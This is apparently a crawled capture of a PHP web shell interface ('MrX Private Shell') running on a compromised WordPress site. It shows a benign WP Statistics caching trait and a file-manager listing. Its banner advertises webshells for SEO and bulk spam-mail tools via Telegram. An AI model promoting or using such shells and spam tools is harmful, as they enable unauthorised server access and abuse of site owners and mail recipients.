__  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

www-data@216.73.216.10: ~ $
<?php

namespace WP_Statistics\Traits;

/**
 * Trait to handle caching logic using WordPress Object Cache.
 */
trait WpCacheTrait
{
    /**
     * Cache group name to avoid collisions.
     *
     * @var string
     */
    protected $cacheGroup = 'wp_statistics';

    /**
     * Sets a value in the cache.
     *
     * @param string $key   Cache key.
     * @param mixed  $value Value to cache.
     * @param mixed  $expire Expiration time in seconds.
     *
     * @return bool True on success, false on failure.
     */
    public function setCache($key, $value, $expire = 0)
    {
        return wp_cache_set($key, $value, $this->cacheGroup, $expire);
    }

    /**
     * Gets a value from the cache.
     *
     * @param string $key     Cache key.
     * @param mixed  $default Default value if not found.
     *
     * @return mixed
     */
    public function getCache($key, $default = null)
    {
        $value = wp_cache_get($key, $this->cacheGroup);

        return ($value === false) ? $default : $value;
    }

    /**
     * Checks if a cache key is set.
     *
     * @param string $key Cache key.
     *
     * @return bool
     */
    public function isCacheSet($key)
    {
        return wp_cache_get($key, $this->cacheGroup) !== false;
    }

    /**
     * Deletes a value from the cache.
     *
     * @param string $key Cache key.
     *
     * @return bool True on success, false on failure.
     */
    public function deleteCache($key)
    {
        return wp_cache_delete($key, $this->cacheGroup);
    }

    /**
     * Fetches data with caching.
     *
     * @param string   $key      Cache key.
     * @param string   $expire   Expiration in seconds.
     * @param callable $callback Function to fetch data if not cached.
     *
     * @return mixed
     */
    public function getCachedData($key, callable $callback, $expire = 0)
    {
        $value = wp_cache_get($key, $this->cacheGroup);

        if ($value === false) {
            $value = $callback();
            $this->setCache($key, $value, $expire);
        }

        return $value;
    }
}

Filemanager

Name Type Size Permission Actions
AjaxUtilityTrait.php File 2.52 KB 0644
ErrorLoggerTrait.php File 990 B 0644
MigrationAccess.php File 943 B 0644
ObjectCacheTrait.php File 1.69 KB 0644
TransientCacheTrait.php File 1.43 KB 0644
WpCacheTrait.php File 2.04 KB 0644
Filemanager